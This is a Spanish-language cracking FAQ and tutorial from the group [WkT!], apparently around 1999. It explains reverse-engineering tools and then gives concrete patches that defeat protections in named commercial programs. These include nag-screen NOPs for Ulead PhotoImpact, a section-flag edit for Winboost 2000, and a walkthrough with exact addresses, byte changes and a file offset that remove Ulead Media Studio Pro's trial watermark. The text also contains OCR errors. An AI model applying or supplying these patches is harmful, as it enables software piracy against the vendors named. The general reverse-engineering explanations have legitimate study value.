se es capaz de analizar el comportamiento del programa y modificarlo para tus intereses." 

Ref.- Como crackear por Estado Porcino. 


¿Qué es un debugger? 


Permite ver paso a paso (instrucción a instrucción) un programa mientras se está ejecutando en la memoria del 
ordenador. 

Las instrucciones se visualizan en ensamblador normalmente. Nos servira para ver como se comportan las rutinas 
de protección ya que son parte del programa. En el podremos cambiar instrucciones para comprobar y asi eludir 
las protecciones. Estos cambios no son permanentes en el fichero ejecutable. 


El mejor debugger es Softlce (Softice para Windows 95) http://www.numega.com 


Para MSDOS existe una versión Softice y otras versiones poco potentes llamadas DEBUG y SymDebug. 


|¿Qué es un desensamblador? 


Un desensamblador toma un fichero de instrucciones en hexa y lo convierte a lenguaje ensamblador. El lenguaje 
ensamblador, es el conjunto de sentencias que entiende el microprocesador 

(tu Pentium o mi 486). El procesador es el corazón del ordenador, todas las sentencias son ejecutadas por él y 
sólo por él. 

Por ejemplo un 43 en hexa se transforma en inc eax. Se necesitan algunos conocimientos de ensamblador pa esto 
de crackear. 

Nosotros usaremos el desensamblador para crakear con la técnica de la lista muerta... 

Ref.- Como crackear por Estado Porcino. 


|¿Qué es un editor hexadecimal? 


"Los programas no son más que un conjunto de instrucciones y cada instrucción no es más que un conjunto de 
bits, pero donde demonios se guardan esos bits?. Los bits del programa se localizan en los ficheros, p.e. las 
instrucciones del programa de compresión ar] se guardan en el fichero arj.exe. Hay algunos programas que no 
guardan todas sus instrucciones en único fichero, si no en varios, un ejemplo de esto son los programas que 
utilizan librerías dinámicas (o dll)." 


Un editor hexadecimal, no es más que un programa, que permite "editar" los ficheros de instrucciones de otros 
programas, osea, que permite ver,modificar,copiar,pegar... los bits de los programas. Para simplificar la cosa no 
se muestran los bits a pelo, sino que se muestran en hexadecimal, de ahí su nombre. 


Nosotros lo utilizaremos para alterar el comportamiento de los programas. Supongamos que conocemos la 
instrucción sentencia de la rutina de protección que debemos modificar, sea jz 23 y queremos modificarla por jnz 
23, bien como toda instrucción no es más que un conjunto de bits, sea 0110 para jz 23 y 1001 para jnz 23, sólo 
nos queda buscar estos bits dentro del fichero ejecutable del programa (que es, en general, el contiene las 
sentencias del programa). Como usamos un editor hexadecimal, debemos buscar la secuencia de un unos y ceros 
en hexa en el fichero del programa que queremos modificar. Si la secuencia que buscamos es muy común 
deberemos utilizar las instrucciones que se encuentran entorno a la instrucción a modificar. 


Esto es muy importante, sólo debe existir una localización del patrón de búsqueda en el fichero, si existe más de 
una, debemos añadir a la búsqueda las sentencias de alrededor, sino se corre el riego de modificar la sentencia 
equivocada, lo que provoca casi siempre un "cuelgue". 

Ref.- Como crackear por Estado Porcino. 


Uno de los más completos es UltraEdit-32 Professional http://www .uedit.com 


|¿Todos los programas se desprotegen de la misma forma? 


No... 
Un programa aún haciendo lo mismo puede programarse de mil formas... Esto se entiende en las protecciones del 
mismo modo (protecciones de numero de serie, etc..). 


Pueden existir miles de formas de proteger un programa, aún siendo el mismo tipo de protección. 
No obstante la "estupidez" de muchos programadores de pacotilla (aquellos que solo ven dinero en sus 
programas), y a la falta de imaginación de otros, hacen que la tarea de desproteger sea a veces muy sencilla. 


¿Qué diferencias hay entre programas hechos en Visual C++ y Visual Basic? 


La mayoría de las aplicaciones programadas mas profesionalmente para Windows 93 (requieren un conocimiento 
mas exhaustivo de programación) son las compiladas en C++... aparte de ser siempre las mas rápidas. 
De hecho Windows 953 está hecho prácticamente en C++... 


La diferencia entre Visual C++ y Visual Basic es la siguiente: 


Con Visual C++ somos como el director general de una oficina mientras que con Visual Basic somos los 
empleados (si entregamos un informe pasaremos por varios departamentos hasta que llegue al despacho del 
director general). 

E incluso no podremos hacer cosas que no pueda hacer el director general. Todo ese proceso interno de pasar de 
un departamento a otro lo realizan unas librerías que actúan mientras se ejecuta el programa (librerías Run-time). 
Estas son VBRUN300, VB40032, MSVBMS5O0 según sea la versión de Visual Basic. 


Desde el punto de vista de un cracker es mucho mas interesante un programa en C++... 

Los crackers suelen huir de programas hechos en Visual Basic, por lo incomodos y pesados que son y porque 
casi nunca aportan nada interesante que investigar. Aunque esto no significa que sean los mas dificiles de 
desproteger. 


¿Cómo saber si un programa esta hecho en Visual Basic? 


Existen muchas maneras, pero todas consisten en lo mismo. Hay que localizar referencias a varias librerias de 
ejecucion. Sus nombres son VBRUNxxx (xxx =100,200,300 para la versión 1,2 y 3 respectivamente), 
VB40032.DLL para la versión 4 del compilador de Visual Basic y MSVBM50.DLL para la versión 5. Las 
formas de localizarlas podrían ser: 


e Usar un editor hexadecimal con el fichero EXE a tratar y usar la opción de busqueda.... Ejemplos de 
texto a buscar: VBRUN300, VB40032, MSVBMS50 

e Usar un desensamblador (W32Dasm) con el archivo EXE y una vez desensamblado mirar al principio 
del listado en la zona de : 


PARA A A A A A 4444 IMPORTED FUNCTIONS 444444 A A A A A A A A A A + 
Number of Imported Modules = 1 (decimal) 


Import Module 001: MSVBVM50.DLL 


Aquí se observa una referencia a la libreria de ejecución de Visual Basic 5.0, con lo que este ejecutable está 
compilado con VBasic. 


|¿Qué es una DLL? 


Es una librería dinámica (Dynamic Link Library). Es un fichero en el que residen funciones(código ejecutable) o 
recursos (ventanas de un programa, menues, iconos, bitmaps, etc...) y que pueden ser llamadas por cualquier otro 
programa de Windows. Existen una gran variedad de DLL personalizadas y comerciales que permiten sacar 
partido a muchos programadores (Jscript.dll =librería de Java Script, TI32v20.d11 =Timelock, rutina de 
protección de programas en periodo de prueba, etc...). 

De hecho Windows 95 usa en su mayoria DLLs... KERNEL32.DLL, USER32.DLL, GDI32.DLL... 

Incluso los archivos DRV y FON (fuentes) son DLL, aunque estos se cargan de forma no automatica... 


¡Pongo un break point en Winice y nunca para el programa en él 


Hay muchas instrucciones de programas que nunca se ejecutan si no se dan las condiciones adecuadas... 
Siempre conviene estudiar un poco el ejecutable, o bien con la lista muerta o con el Winice. 
Poner en cualquier punto del programa un breakpoint no lleva a nada si no sabemos donde lo ponemos. 


¡Cuando paro un programa con Ctrl+D en Winice me aparece el listado en una zona llamada KERNEL32 


Esto es muy normal, teniendo en cuenta que Windows 93 usa internamente un API 
(Interfaz de Programación Avanzada) núcleo de sistema (Kernel) de 32 bits. 
El kernel32 es el minimo de código que necesita Windows93 para arrancar el sistema. 


También la mayoria de los programas suelen usar esta API para realizar operaciones basicas con sus funciones( 
uso de archivos, tareas, recursos, carga de librerías, uso de la memoria, etc..). Hay unas 780 funciones dentro de 
esta librería. 

Muchas rutinas de protección hacen uso de funciones de esa librería y de otra llamada USER32.DLL. 


Para nosotros el listado interno de estas librerias no interesa. Usaremos estas funciones como cajas tontas (solo 
interesará lo que nos muestre por fuera no como esté hecha por dentro). Es decir, si un programa usa la función 
GetComputerName (obtener el nombre de la computadora), solo nos interesará el nombre que la computadora, 
no como lo obtiene internamente. 
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FAQ 1 WKT Tutorialz Site | FAQ 3 


Introducción 


Estas leyendo la FAQ Oficial de [Wk'T'!]. Este proyecto fue iniciado en su momento 
(1997) por Mr.Red [WkT!], y ahora volvemos a reabrirlo para deleite de todos 
nuestros lectores. La versión inglesa aún no esta disponible, y es posible que nunca 
llegue a ver la luz. A no ser que algún alma caritativa se ofrezca voluntaria a iniciar 
la traducción. Algún voluntario??? 

Si es así, por favor envianos un e-mail. 


Si tus dudas aún no están resueltas en esta FAQ, [WkT!] te recomienda que te pases 
por la Web de Gerza, donde encontrarás la FAQ Oficial del "Spanish 


ReverseEngineering Forum". 


Si alli tampoco encuentras lo que buscas, utiliza ese foro. 


Vi 


¿Por qué todos los crackers están contra Microsoft? 

¿Dónde puedo encontrar más información sobre "ingeniería inversa" 
(Reverse Engineering)? 

¿No me funciona un crack? 

¿Qué es un generador de claves (key generator)? 

¿Qué es Softice y Winice? 

¿Cómo puedo configurar el Softice o Winice para usarlo en nuestros asuntos? 
¿Qué es el ensamblador? 

¿Qué es un parche? 

¿Como se desprotegen las pastillas o mochilas (protección hardware)? 
¿Cómo se que es lo que tengo que cambiar para desproteger? 


|¿Por qué todos los crackers están contra Microsoft? 


Microsoft pretende imponer sus normas a todo el mundo. Aparte de crear un sistema operativo lleno de errores e 
inestable por todos los lados, hacen uso de estrategias de todo tipo para imponerse a todo el mundo sin importar 
como. 


Esto no significa que otra compañia sea la buena de la película... Limitan la capacidad de los usuarios a elegir su 
sistema operativo, navegador, etc... 


¿Dónde puedo encontrar más información sobre "ingeniería inversa” (Reverse Engineering)? 


El mejor sitio donde encontrar esa información es http://surf.to/fravia 


Recomendamos el uso del navegador Netscape ya que muchas páginas son Anti-Microsoft 
(Internet Explorer) Es un lugar que no hay que dudar en visitarlo... 


¿No me funciona un crack? 


¿Has probado a copiar el crack en el mismo directorio del ejecutable del programa a desproteger? 
¿Tienes una versión distinta? 
¿Te has leido el wkt.nfo que acompaña a todos nuestros cracks? 
Si la respuesta a las preguntas de arriba es Si y no va el crack... 
Pues que quieres que te diga... 

Buscate la vida... o aprende a crackear por ti mismo. 


Y recuerda, los cracks producidos por [WkK'T'!] tienen como única finalidad permitir una mejor evaluación del 
programa al que van destinados, así como enseñar las limitaciones de las protecciones empleadas. 

En ningún caso los cracks deben ser utilizados para evitar el pago del correspondiente programa. 

Si crees que un programador ha realizado una buena aplicación, que te es útil, que la usas y además está bien 
programada, entonces obra adecuadamente y recompénsalo registrándote. 

Nosotros no nos hacemos responsables de lo que tú hagas con nuestros cracks. 


|¿Qué es un generador de claves (key generator)? 


Es un programa que esta basado en un algoritmo de protección. 
El llegar a conocer este algoritmo, requiere un estudio avanzado de un programa. 
Permiten obtener el número de serie de un programa. 

Es una forma elegante de desprotección. 

A veces son muy complejos y otras veces son muy sencillos y simples. 


|¿Qué es Softice y Winice? 


Es el nombre de uno de los depuradores de código mas potentes que existen. El nombre se usa indistintamente 
para este depurador (debugger). Hay versiones para DOS y para Windows (Winice). El nombre mas usado es el 
de Softice tanto para DOS como para Windows. 


¿Cómo puedo configurar el Softice o Winice para usarlo en nuestros asuntos? 


Una manera de configurar Softice sería editar el archivo winice.dat (dentro del directorio de instalación del 
Softice). 

Cambiar las lineas siguientes: 

INIT=X;wl;wr;wd7;code on; 

HST=512 

A toda línea del tipo EXP=cWwindowsisystemisystem.drv , quítale el punto y como inicial. 

Siempre que un programa use una DIl especial, puedes añadirla en este archivo. 


Ref.- Como crackear por Estado Porcino. 


|¿Qué es el ensamblador? 


Es un tipo de lenguaje de programación (ensamblador, C++, Pascal, Cobol, Basic...). Es un lenguaje de bajo 
nivel. Esta formado por nemotécnicos de ingles (JMP ->proviene de JUMP, NOP ->No OPeration, MOV - 
>Move, etc..). 

Es de los lenguajes mas próximos a la CPU... 

Cada instrucción esta formada por una serie de bytes que hacen actuar a la CPU. 

Ejemplos de instrucciones: 


Byte(s) hexadecimal Instrucción ensamblador 
66 F7 C6 01 00 TEST S1,0001 
C3 RET 
90 NOP 
F3 A5 REPZ MOVSD 
Fc CLD 


Introducciendo en la CPU esta ristra de bytes (66 F7 C6 01 00 C3 90 F3 AS FC) se ejecutarán esas instrucciones. 
Por supuesto la CPU sabe separar instrucciones aparte de otras cosas... 


Este lenguaje posee mas de 100 instrucciones... y aprender este lenguaje nos ayudará a comprender los 
programas que queramos desproteger... 


|¿Qué es un parche? 


Es un cambio que se realizará en un programa para hacer que este se comporte como deseemos para siempre... 
Los cambios se realizan a nivel de bytes... ya que las instrucciones en ensamblador o cualquier dato siempre 
estarán formadas por bytes. 


¿Como se desprotegen las pastillas o mochilas (protección hardware)? 


Poniendo breakpoints en los puertos de impresora. bpio -h xxx -->>xxx=dirección de puerto de impresora 

bpio -h 378 

Existen varios tipos de protección... 

Hay pastillas que tienen parte del programa encriptado en su interior, con lo que es practicamente imposible de 
desproteger si no se tiene la pastilla. 

Hay otras pastillas que solo se usan como comprobación, con lo que la protección suele ser una chapuza y a 
veces es incluso mas facil que protecciones de numero de serie... 

(Nota a los programadores: es una tonteria que useis protecciones del segundo tipo, ahorraros el dinero o usar las 
del primer tipo... Aunque mejor seria bajar los precios al no tener que usar pastilla) 


¿Cómo se que es lo que tengo que cambiar para desproteger? 


Depende de la cantidad de bytes que tengamos que cambiar. 
O se tiene información de la codificación de instrucciones en ensamblador (paso de instrucción a bytes) o lo 
mejor es usar el Softice con el comando A cs:Xxxxxxxx (donde xxxxxxxx es la dirección donde está la 
instrucción a cambiar). 

Tecleamos la instrucción a cambiar y asi podremos obtener los bytes nuevos. 


ejemplo: 

13F :0000109B 74 07 JZ 10A4 <---instrucción a cambiar por JMP 10A4 
-A 13F:109B 

13F:109B_ JMP 10A4 

13F :0000109B EB 07 JMP 10A4 <---instrucción cambiada 


Normalmente se tienen pocos bytes para cambiar y conviene usar algunos trucos... 
Por ejemplo.- Asignar el registro EAX a 1 con la instrucción: 
(B8 01 00 00 00) MOV EAX,1 <----- (ocupa 5 bytes) 
ocupará mas bytes que usar las instrucciones 


(33 CO) XOR EAX, EAX <------ (ocupa 2 bytes, pone a cero EAX) 
(40) INCEAX <------ (ocupa 2 bytes, incrementa EAX). 
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FAQ 2 WKT Tutorialz Site FAQ 4 


Introducción 


Estas leyendo la FAQ Oficial de [WkT!]. Este proyecto fue iniciado en su momento 
(1997) por Mr.Red [WkT!], y ahora volvemos a reabrirlo para deleite de todos nuestros 
lectores. La versión inglesa aún no esta disponible, y es posible que nunca llegue a ver la 
luz. A no ser que algún alma caritativa se ofrezca voluntaria a iniciar la traducción. 
Algún voluntario???? 

Si es así, por favor envianos un e-mail. 


Si tus dudas aún no están resueltas en esta FAQ, [WkT!] te recomienda que te pases por 
la Web de Gerza, donde encontrarás la FAQ Oficial del "Spanish ReverseEngineering 


Forum". 
Si alli tampoco encuentras lo que buscas, utiliza ese foro. 


» 
Ven 


¿Qué es el Procdump? 

¿Cómo puedo saber si un programa está comprimido? 

¿Qué es la función Hmemcpy? 

¿Por qué a veces no puedo ver las "string references" cuando utilizo el W32Dasm? 
¿Qué significa "Crippleware"? 


¿Cómo puedo saber si un programa accede al registro del Windows? 
¿Cómo puedo saber si un programa accede a algún archivo? 

¿Cómo se puede "cazar" un serial en un programa escrito en Visual Basic? 
¿Qué es eso del "Color Crack" o "crack en colores"? 

¿Qué es una Nag Screen? ¿Cómo se puede eliminar? 


¿Qué es el Procdump? 


ProcDump es una herramienta que te permite (entre otras cosas) copiar el contenido de un proceso al disco duro. 
También te permite editar la cabecera de los programas de tipo PE (Portable Executable). 


¿Cómo puedo saber si un programa está comprimido? 


La mejor forma de averiguar si un programa está comprimido es utilizar alguna herramienta como el Gettyp. 
Es conveniente tenerlo siempre a mano, al igual que el Procdump (para descomprimir el programa en cuestión). 
Utilizando el Gettyp sabremos el tipo de compresor utilizado (Aspack, petite, upx....etc). 


¿Qué es la función Hmemcpy? 


HMEMCPY es una API de Windows, que utiliza la memoria RAM para leer, manipular, comparar y almacenar 
cadenas (texto que introducimos cuando un programa nos pide el numero de serie por ejemplo). La funcion recoge la 
informacion que le proporcionamos y la carga en memoria. Despues manipula esas cadenas, las mueve y las compara 
(por ejemplo compara tu numero de serie con el correcto), y despues decide si la cadena es o no la correcta. 

La funcion HMEMCPY devuelve esta informacion al programa en cuestion, y si has puesto el serial correcto te lo 
aceptara o de lo contrario te mostrara una bonita ventana de error. 

HMEMCPY se puede utilizar para "cazar" numeros de serie validos en programas shareware. Utilizando un debugger 
(depurador) como el Softlce, podemos poner un breakpoint en HMEMCPY para que el programa se pare y nos avise 
cuando llama a la funcion. Muchos programas shareware utilizan esta función para comparar numeros de serie, sobre 
todo cuando han sido escritos en Delphi o en Visual Basic. 


¿Por qué a veces no puedo ver las ''string references'' cuando utilizo el W32Dasm? 


Pues depende. En ocasiones se debe a que el programa tiene algún tipo de protección anti-desensamblado. 

Un ejemplo: En el caso del programa Winboost 2000 (Protección analizada por Mr.WhiTe, véase http://ecd.tsx.org) 
Sucede que al editar el *.exe (previamente descomprimido con el ProcDump) y seleccionar "Edit section". Abajo, 
donde pone "Section Characteristics" si modificamos el valor CODOO0040 por E0000020 y guardamos los cambios, la 
protección habrá desaparecido mágicamente. 


¿Qué significa "Crippleware''? 


Cuando un programa incorpora alguna de sus opciones deshabilitada (como por ejemplo guardar un archivo) 
existen dos posibilidades: 


e El código que hace funcionar esa función está presente en el programa pero no esta activada. 
e El código no esta presente en el programa. Entonces se dice que el programa es "Crippleware". 


Es posiblemente la mejor opción a la hora de proteger un programa. 
Es muchisimo más dificil que un Cracker consiga habilitar esa función (pero no imposible). 


¿Cómo puedo saber si un programa accede al registro del Windows? 
"Utilizando una herramienta llamada REGMON (Registry Monito 
¿Cómo puedo saber si un programa accede a algún archivo 
"Utilizando una herramienta llamada FILEMON (File Mori 
¿Cómo se puede "cazar" un serial en un programa escrito en Visual Basie? 


El Visual Basic no es precisamente el lenguaje más apropiado para programar una aplicación comercial. En el caso de 
toparnos con una de estas "joyas", una opción muy aconsejable es echar mano del Smartcheck de la empresa Numega 


¿Qué es eso del ''Color Crack' o "crack en colores''? 


Se trata de una "nueva" técnica de cracking empleada por Estado+Porcino. 
Es bastante útil cuando el mensaje de "error" no es una ventana sino una cadena dentro de una ventana. 
Debemos averiguar el color que se aplica al mensaje y colocar en el Softlce: 

bpx nombreRutina if (*(esp+8)==00BBGGRR) 

Recordad que los valores de Blue(azul), Green (Verde), Red (rojo) están en hexadecimal. 

Para más información véase el tutorial sobre el Multimedia Builder en http://ecd.tsx.org. 


¿Qué es una Nag Screen? ¿Cómo se puede eliminar? 


Una Nag Screen es una ventana que nos molesta durante la ejecución de un programa. Los motivos pueden ser muchos 
(Aparece al arrancar el programa recordandonos que no estamos registrados, nos informa de algo y nos obliga a esperar 
a que desaparezca, nos obliga a pulsar un botón para mandarla a paseo......etc) 

No existe ningún método estandar para crackear las Nags. Depende del programa y de la función utilizada para pintar la 
ventana. No es lo mismo el típico MessageBox con el botón de aceptar que otro con varios botones. Tambien hay que 
tener en cuenta si el programa realiza alguna modificación en la pila. Un par de ejemplos sencillos para entender "el 
concepto": 


Programa: Lotus SmartSuite Millenium Edition (Protección analizada por Mr.WhiTe) véase http://ecd.tsx.org. 

En este caso la ventana se presenta en pantalla haciendo uso de la función dialogboxparama. 

Nos aparecen varios botones. El que nos interesa pulsar es el botón de "Ok". ¿Soluciones? 

La mejor opción dadas las circunstancias será provocar que el programa pulse por si mismo el botón. 

¿Como conseguimos esto? 

Si pulsamos el boton "OK" nos devolvera el valor 10, así que en el momento de pasarle los parámetros a la función 
dialogboxparama, forzamos el programa a introducir el valor 10 en EAX. Para más información consulta la Win32 
Programmer's Reference 


Programa: Ulead Photolmpact v4.12 (Protección analizada por Mr.WhiTe) véase http://ecd.tsx.org. 


En este caso podemos saltarnos la molesta ventana simplemente evitando que el programa llame a la función 
DialogBoxParamA. Para ello sustituimos la llamada por unos cuantos bytes inofensivos: 


:4EB066CD FF15F4A3B14E Call dword ptr [4EB1A3F4] <--- Llamada a DialogBoxParamA 


: 4EB066CD 909090909090 NOP NOP NOP NOP NOP NOP <---— Código inofensivo 


Ojo: Esta opción no siempre es posible. En este caso sabemos que no sucedera ningún imprevisto porque el programa 
no realiza ninguna modificación en los valores almacenados en la Pila. 
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ESTUDIO COLECTIVO DE DESPROTECCIONES 


WKT Tutorialz Site 


L) 


Programa Ulead Media Studio Pro v5.01 | W9S5 / W98 / NT 


Se trata de una interesante suite de creación multimedia: 


Descripción : A ] 
P audio, dibujo, video... 


Tipo Trial de 30 dias 


Url http://www .ulead.com 


Protección Nag Screen. Time Limit 30 Dias 


Dificultad 1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 


Herramientas Softlce v3.25, Referencia API32 
Objetivo Conseguir que no caduque el programa y Eliminar una horrible X 
Cracker Estado+Porcino 


Fecha Septiembre de 1999 


VW 


INTRODUCCION Y AGRADECIMIENTOS DE Mr.WhiTe [WkT!] 


Hace ya algún tiempo cayó en mis manos este interesantisimo programa de Ulead, al cual obviamente 
no me pude resistir. Resultó un adversario bastante digno, quizá demasiado para mi estilo de cracking. 
Poco tiempo libre y alguna que otra neurona ausente por vacaciones. Así que tras docenas (no 
exagero, lo juro) de e-mails pidiendo como llorones que publicase un fix de mi crack evitando las 
dichosas X, me vi obligado a endosarle el muerto a otro. ¿Para qué estan los amigos? :0) 


Por lo tanto agradecimiento DOBLE para: 
Estado+Porcino y tambien para Mr.PinK [WkT!] que ha colaborado en este artículo. 
Que lo disfruteis. 


VI 


CAPITULO VII. Desclavando cruces con Jose de Arimatea. 


VIH 


DISCULPAS Y FELICITACIONES 


Whiskey Kon Tekita 


Saludos Familia. 
Cuanto tiempo, otra vez. 


EL escaso tiempo y la falta de protecciones realmente interesantes que caen en mis manazas 
ralentizan los nuevos capítulos. 


Primero mis felicitaciones al nuevo y excelente panorama crack español. Grupos como [WkT!], webs 
tan interesantes como las de ECD (Estudio Colectivo de Proteccciones) y foros de comunicación 
(http://disc.server.com/discussion.cgi?%id=23018) ponen en contacto a los excelentes crackers que 
existen en España. 

Felicitaciones a la Gorda por aguantarme tanto tiempo sin tararse :-) 


Os 
Vi 


UN PRIMER VISTAZO 


Echemos un vistazo a nuestro "niño" 
La proteccion tiene 2 niveles claramente identificados: 


1.- Proteccion Cinderella de 30 días. 
2.- Unas X rojas censoras en el editor de dibujo y en el editor de video. 


Ademas existen 2 nags de entrada que nos recuerdan lo mísero de la existencia no registrada. 


a 
VA 


X CENSORAS EN EL EDITOR DE DIBUJO 


Bien, saltemos las nags por ahora y abramos el editor de dibujo vpaint. 


Pinchemos en File/New/OK y tendremos un bonito lienzo pa dibujar. Un par de brochazos cutres y pulsemos intro para ver la animación. 
Sale una horrenda y roja X censora que tapa nuestros estúpidos brochazos. Empezemos a pensar un poco.Como se podra dibujar una X 
en pantalla. Pos, inicialmente no se me ocurre nada. Bueno sí color crack, pero si lo utilizamos aparecemos en un nido de llamadas del 
API de Video, asi que lo dejamos. Veamos que herramientas utiliza aplicando la lista muerta. Lo primero que encontramos en la lista de 
funciones importadas es: 


Import Module 001: MSVFW32.dll 


Addr:00086998 hint(0002) Name: DrawDibClose 

Addr:000869A8 hint(0003) Name: DrawDibDraw 

Addr:000869B6 hint(0007) Name: DrawDibOpen 

Esto se parece mucho a MocoSoft Video For Window 32 bits. Recordemos que estamos montando una animación, así que es lógico que 
usemos esta librería. Conozcamos algo acerca del formato DIB gentileza de la ayuda de M$ VC++ 


DrawDib Functions An application uses DrawDib functions to create and manage a DrawDib DC, display and update images on-screen, 
manipulate palettes, and to close the DrawDib DC when it's no longer needed. The DrawDib functions also include a timing function 
and a test function to determine display characteristics. 


Veamos un poco mas acerca de la funcion drawdib que es la que tiene mas pinta de ayudarnos: 


The DrawDibDraw function draws a DIB to the screen. 


BOOL DrawDibDraw( HDRAWDIB hdd, HDC hdc, int xDst, int yDst, int dxDst, int dyDst, LPBITMAPINFOHEADER 1lpbi, 
LPVOID lpBits, int xSrc, int ySrc, int dxSrc, int dySrc, UINT wFlags ); 


Asi pues con esto pinta en pantalla, pero ¿qué tenemos que buscar? 


Lancemos nuestro querido Sice cargando previamente el Load Expoorts la libreria MSVFW32.d1l Abramos el vpaint y antes de darle al 


intro pongamos un "bpx drawdibdraw". Y boom, aparecemos en MSVFW32!drawdibdraw con f12 regresamos al vpaint. A esta hora ya 
ha aparecido la jodida X censora pintada por drawdibdraw, como suponiamos. Aparecemos en: 


* Reference To: MSVFW32.DrawDibDraw, Ord:0003h 


:0046512E E879760000 Call 0046C7AC // Aqui se pinta la X censora */ 
:00465133 56 push esi 


* Reference To: MSVFW32.DrawDibClose, Ord:0002h 


:00465134 E86D760000 Call 0046C7A6  // Cerramos el dib 
:00465139 C745FCFFEFFEFFEF mov [ebp-04], FFEFFFEFEFF 

:00465140 E874000000 call 004651B9 

:00465145 B801000000 mov eax, 00000001 

:0046514A EB77 jmp 00465103 


Bien, ya sabemos donde se pinta la X, ahora existen 2 opciones: 


e Que la X se introduzca de forma incondicional ya que estamos en una version Trial del programa. 
e Que se introduzca de forma condicional 


La opción B es la más sencilla de rastrear, así que adelante con ella: 


Si rastreamos quien llama a estas sentencias observamos : 


:00465A84 ES5TETFFFF call 004651E0 // Si eax==0 no pintamos la X censora. 
:00465A89 85C0 test eax, eax 

:00465A8B 741A je 00465AA7 //Salto Condicional 

:00465A8D 8B442410 mov eax, dword ptr [esp+10] 

:00465A91 8B4E04 mov ecx, dword ptr [esi+04] 

:00465A94 50 push eax 

:00465A95 E8C6F5FFEF call 00465060 //Pinta la X 


Rastreando :004651E0 vemos: 


:004651E0 56 push esi 

:004651E1 57 push edi 

:004651E2 8BF9 mov edi, ecx 

:004651E4 85FF test edi, edi 

:004651E6 7427 je 0046520F 

:004651E8 837F2000 cmp dword ptr [edi+20], 00000000 //Flag de control de X 
:004651EC 7421 je 0046520F //Saltamos si no hay que pintar la X 
:004651EE 8B742410 mov esi, dword ptr [esp+10] 

:004651F2 56 push esi 

:004651F3 E848FDFFEF call 00464F40 

:004651F8 8B476C mov eax, dword ptr [edi+6C] 

:004651FB 8B4C240C mov ecx, dword ptr [esp+0C] 

:004651FF' 50 push eax 

:00465200 56 push esi 

:00465201 51 push ecx 

:00465202 8B4F78 mov ecx, dword ptr [edi+78] 

:00465205 E8E6020000 call 004654F0 

:0046520A 5F pop edi 

:0046520B 5E pop esi 

:0046520C C20800 ret 0008 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
| :004651E6(C), :004651EC (C) 


:0046520F 33C0 xor eax, eax //Flag activado para evitar las X 
:00465211 5F pop edi 

:00465212 5E pop esi 

:00465213 C20800 ret 0008 

Si cambiamos :004651E6 7427 je 0046520F 

por :004651E6 EB27 jmp 0046520F 


No aparece la X pero tampoco nuestros garabatos, asi que 
sigamos subiendo para ver que encontramos: 


:004392A3 E888F10100 call 00458430 //Asigna el flag. 

:004392A8 85C0 test eax, eax 

:004392AA 740C je 004392B8 //Saltamos el 32c1pbd.dib_MarkVideo???7?7 
:004392AC 8B07 mov eax, dword ptr [edi] 

:004392AE 50 push eax 


* Reference To: u32clpbd.dib_MarkVideo, Ord:0001h 


:004392AF FF15DC684800 Call dword ptr [004868DC] 11/2227? 
:004392B5 83C404 add esp, 00000004 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :004392AA(C) 

| 

:004392B8 8B75EC mov esi, dword ptr [ebp-14] 
:004392BB 8B07 mov eax, dword ptr [edi] 
:004392BD 83C608 add esi, 00000008 

:004392C0 50 push eax 

:004392C1 8B5508 mov edx, dword ptr [ebp+08] 
:004392C4 8BOE mov ecx, dword ptr [esi] 
:004392C6 51 push ecx 

:004392C7 52 push edx 

:004392C8 B908344800 mov ecx, 00483408 

:004392CD E89EC70200 call 00465A70 //Lamada para pintar la DIB 


Esto se parece mucho a lo que buscabamos, un salto condicional 
sobre una función que trabaja con DIB y con video. 


Miremos por 00458430 


:00458430 8B81CC010000 mov eax, dword ptr [ecx+000001CC] //Flag de control de X 
:00458436 85C0 test eax, eax 

:00458438 7403 jmp 0045843d 

:0045843A 33C0 xor eax, eax //Buen chico sin cruces en las espaldas 
:0045843C C3 ret 

:0045843D 8B8064010000 mov eax, dword ptr [eax+00000164] 

:00458443 2D15050000 sub eax, 00000515 

:00458448 83F801 cmp eax, 00000001 

:0045844B 1BCO sbb eax, eax //Asigna flag para pintar la X 
:0045844D F7D8 neg eax 

:0045844F C3 ret 


Si cambiamos 


:00458438 7403 jmp 0045843d 
Por :00458438 33C0 xor eax.eax (Offset 0x57838 en Vpaint.exe) 


Solucionado el tema, probémoslo y funciona a las mil maravillas. 


X CENSORAS EN EL EDITOR DE VIDEO 
Conociendo el precio del pescao, miremos si existe u32clpbd.dib_MarkVideo dentro de las funciones importadas por el veditor.exe. No 
hay suerte, así que pintan la X de forma diferente, pensemos, por que aquí es donde reside la diversión. 


¿Cómo narices pinta la X? 


Recordemos la función que se utiliza para pintar en pantalla MSVFW32.DrawDibDraw. 

Abramos el editor e insertemos un AVI al final de la secuencia poniendo un bpx drawdibdraw. 

La funcion se activa 2 veces antes de dibujar la jodida X en :00488C0E. Si subimos y buscamos saltos condicionales, no encontramos 
nada aprovechable, así que un poco de ZEN. 


La función DrawDibDraw usa un bitmap que es el que pinta en pantalla. este bitmap lo encontrmos como 7” parámetro de la función: 
LPVOID IpBits, 
TRAMPA PARA OSOS 


Insertemos un trozo de video al final de la secuencia para dejar varios segundos en blanco sólo para la X censora. 


En :00488C00 55 push ebp “//Encontramos el puntero a los bytes del bitmap. 


Si ponemos un bpx 00488C00 y guarreamos el las bytes del bitmap vemos 

que guarremos la X que dibujamos, así que estamos en el buen camino. 

Como la secuencia de video está al final, sólo hay secuencias en blanco con la X antes del verdadero video. 
El aspecto del bitmap es todo FF FF FF FF excepto cuando hay que pintar la X que cambia a 00 00 00 

La trampa esta servida pogamos un bpm XXXX W en algunos de los ceros y vemos quien escribe 


:0048B2DC C6430100 mov [ebx+01], 00 


Estamos en plena rutina de creación de la X censora. 
Esta rutina empieza en :0048B 18D y es llamada condicionalmete por 


:0048B17B 837E1000 cmp dword ptr [esi+10], 00000000 //Test flag. 
:0048B17F 740C je 0048B18D //Salta y pinta la X 


Si ponemos un bpx en 0048B17B y seguimos indagando, vemos que el flag es realmente [590ff0] 


Poniendo un bpm 590ff0 w aparecemos en: 


:00527130 A1E8235700 mov eax, dword ptr [005723E8] 

:00527135 8B8064010000 mov eax, dword ptr [eax+00000164] 

:0052713B 3D14050000 cmp eax, 00000514 //Si el flag maestro es 514 entra de forma normal 
:00527140 752B jne 0052716D 

:00527142 8B44240C mov eax, dword ptr [esp+0C] 

:00527146 8B4C2408 mov ecx, dword ptr [esp+08] 

:0052714A 8B542404 mov edx, dword ptr [esp+04] 


* Possible Reference to String Resource ID=00001: "VE" 


